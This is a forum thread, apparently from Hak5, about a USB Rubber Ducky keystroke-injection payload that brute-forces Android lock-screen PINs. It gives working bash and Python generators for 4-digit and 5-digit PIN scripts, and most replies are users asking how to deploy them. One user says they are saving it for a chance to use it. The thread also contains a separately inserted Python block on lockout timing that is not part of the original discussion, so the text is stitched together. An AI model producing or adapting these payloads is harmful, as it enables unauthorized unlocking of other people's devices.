[Payload] Android Brute Force 4-digit pin


Darren Kitchen

The Ducky script works great, Major props for this Darren. I've been using a micro USB hub 3 in 1 powered with an external battery to keep the phone charged for the time needed to brute force the pin. How can I amend the Ducky script to capture the correct pin as a text file on the Ducky?

On 06/12/2012 at 11:31 PM, Darren Kitchen said:

I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

 


[CODE]
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

Hey Darren,

Any chance of putting your 600k script on GitHub so we can look at it?
Cheers

echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt

5 digit 

On 6/28/2017 at 0:36 PM, b0N3z said:

echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt

5 digit 

That will take a very long time..

10 hours ago, Dave-ee Jones said:

That will take a very long time..

As per Darren, about 166 hrs.


Hey, I made a script to generate the 4-digit combinations in Python, so if you have Python just copy the code and run it, and in the output you will have the combinations.

In Python it was harder to make because Python is not made to do brute force and has its limits, but finally I made the code.

(I am just 15 years old and a starter in Python, so possibly the code can be better than that)

Here is the code:

"""
change x=int(Put a number) Down
Put only 1-9 and copy all code
and then you have the Payload
"""
x=int(0)
number=int(0)
while (number)<=9:
  print"STRING",(str(x))+"00"+str(number)
  print"ENTER"
  if (number) in list(range(0,9,5)):
   print"DELAY 34250"
   (number)+=int(1)
  else:
   number+=int(1)
   if (number) == 10:
    while number <= int(100):
     print"STRING",(str(x))+"0"+str(number)
     print"ENTER"
     if (number) in list(range(10,100,5)):
      print"DELAY 34250"
      (number)+=int(1)
     else:
      (number)+=int(1)
      if (number) == int(100):
       while number != int(1000):
         print"STRING",(str(x))+str(number)
         print"ENTER"
         if (number) in list(range(100,999,5)):
          print"DELAY 34250"
          (number)+=int(1)
         else:
          (number)+=int(1)
          if (number) == int(1000):
           x+=int(1)
           break
On 12/12/2012 at 5:36 PM, keb0x80 said:

I created a script to generate pretty much the same output using only bash loops/conditions

 


[CODE]
#!/bin/bash
count=0
echo "DELAY 5000"
for pin in {0000..9999}
do
  count=$((count+1))
  echo "STRING $pin"
  # After every other pin, do this
  if [ $((count % 2)) -eq 0 ]; then
    echo "DELAY 1000"
    echo "ENTER"
    echo "ENTER"
  fi
  # After 5 pins, do this
  if [ $((count % 5)) -eq 0 ]; then
    for (( delay=0 ; delay < 4 ; delay=delay+1 ))
    do
      echo "DELAY 5000"
      echo "ENTER"
    done
  fi
done
[/CODE]


I'm on ducktoolkit.com and when I put this in the encoder it rejects it as "does not recognize ! in bash". What am I doing wrong?

On 12/6/2012 at 7:38 PM, Darren Kitchen said:

No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

 

On 12/6/2012 at 5:31 PM, Darren Kitchen said:

I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

 


[CODE]
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]


I'm on ducktoolkit.com and trying to use this script but it doesn't work. What am I doing wrong?


The script is made to run in a bash terminal to create the text file needed to make the inject.bin file for the Ducky. This won't work by just trying to convert the command.

On 12/6/2012 at 5:31 PM, Darren Kitchen said:

I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

 


[CODE]
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]


So how do I use this code on your duck tool kit.com site?

On 7/5/2017 at 6:24 PM, TTT101907 said:

So how do I use this code on your duck tool kit.com site?

Do you have linux?


Hi, I'm a newbie :P .. How can I encode this code so it works and create the inject.bin?

Then put it into an Android smartphone with the USB Rubber Ducky?


Because the code

[CODE]
#!/bin/bash
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " 
[/CODE]

It says that it is not language appropriate and I can't create the inject file on duckytools. Thanks

 


This method won't work on my Android phone. It's set to use the Sim-pin, so 3 wrong tries and you'll need the PUK (aka. SuperPIN) :grin:

But I have it saved locally in case I get the chance to use it.

3 hours ago, fabrice said:

I think it's not for the sim pin, but only for android device access.

I know :wink: It's only for the android-based access code option.


To summarize for new users: the code provided is designed to be executed within a Linux shell. It will then output a file named

android_brute-force_0000-9999.txt

From there, take that and encode it on ducktoolkit.com. There is one line for every PIN combination, which is why it's 600K.

I don't know if this payload still works, I'm going to try it on an s8+ with a USB -> USB-C converter and post the results.


When I put the original script into the ducktoolkit encoder it doesn't encode it into an inject.bin but instead it says "command echo not found in language file." Can someone please help?

[CODE]
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

The original script^

8 hours ago, Jay1 said:

When I put the original script into the ducktoolkit encoder it doesn't encode it into an inject.bin but instead it says "command echo not found in language file." Can someone please help?

It generates the text-file android_brute-force_0000-9999.txt which you have to encode.

The script you posted has to be executed in a shell

On 1/16/2018 at 3:43 AM, cmd97 said:

To summarize for new users: the code provided is designed to be executed within a Linux shell. It will then output a file named


android_brute-force_0000-9999.txt

From there, take that and encode it on ducktoolkit.com. There is one line for every PIN combination, which is why it's 600K.

I don't know if this payload still works, I'm going to try it on an s8+ with a USB -> USB-C converter and post the results.

I doubt it will work on such a recent version ...
Surely it works up to the KitKat version (4.4.2) and maybe (I'm not sure) up to 5.0, but the newer Android versions, after some attempts, increase the waiting time between one attempt and the next exponentially, and then you would have to fix the script even just to give it a try ....

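As an added example (not code from the thread), here is the arithmetic behind Darren's 16.6 h / 166 h / roughly 1900 year figures, and why the escalating lockout of later Android versions mentioned above changes the picture: the worst-case time to exhaust the PIN space is computed from the lockout policy alone. The escalating policy (doubling lockout, 1 h cap) and the 365-day year are assumptions of this model, not measured values of any Android release.

```python
"""Worst-case time to exhaust a numeric PIN space under a lockout policy.

Added example, not from the thread. Typing time is ignored: with a 30 s
timeout after every 5 wrong tries the lockouts dominate, which is exactly
how the 16.6 h (4 digits) and 166 h (5 digits) figures arise.
"""

SECONDS_PER_HOUR = 3600
SECONDS_PER_YEAR = 365 * 24 * 3600   # assumption: plain 365-day year


def fixed_lockout_seconds(pin_digits, tries_per_window=5, lockout_s=30):
    """Policy from the thread: a fixed lockout after each window of tries.
    In the worst case every try fails, so every window costs one lockout."""
    windows = 10 ** pin_digits // tries_per_window
    return windows * lockout_s


def backoff_lockout_seconds(pin_digits, tries_per_window=5, first_lockout_s=30,
                            factor=2, cap_s=3600):
    """Hypothetical escalating policy (parameters are assumptions, not any
    Android release's real values): each lockout is `factor` times the
    previous one until it reaches `cap_s`, after which it stays at the cap."""
    windows = 10 ** pin_digits // tries_per_window
    total, wait, done = 0, first_lockout_s, 0
    while done < windows and wait < cap_s:   # escalating phase
        total += wait
        wait = min(wait * factor, cap_s)
        done += 1
    return total + (windows - done) * cap_s  # remaining windows at the cap


def hours(seconds):
    return round(seconds / SECONDS_PER_HOUR, 1)


def years(seconds):
    return round(seconds / SECONDS_PER_YEAR, 1)


if __name__ == "__main__":
    for digits in (4, 5, 10):
        fixed = fixed_lockout_seconds(digits)
        print(f"{digits}-digit PIN, fixed 30 s per 5 tries: "
              f"{hours(fixed)} h ({years(fixed)} y)")
    backoff = backoff_lockout_seconds(4)
    print(f"4-digit PIN, doubling lockout capped at 1 h: {hours(backoff)} h")
```

With the cap set equal to the first lockout the escalating policy collapses to the fixed one, which is a quick sanity check on the model.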
  • 1 month later...

Hello Darren, I love the show and all the information you guys put out. I just got my Rubber Ducky not long ago and have been messing around with it. I was wondering if there is a way to save the information gathered to the Rubber Ducky itself? And would I be able to, say, use an 8GB micro SD instead of the one it came with? Sorry if my question seems ignorant or anything, I'm just curious!!

 
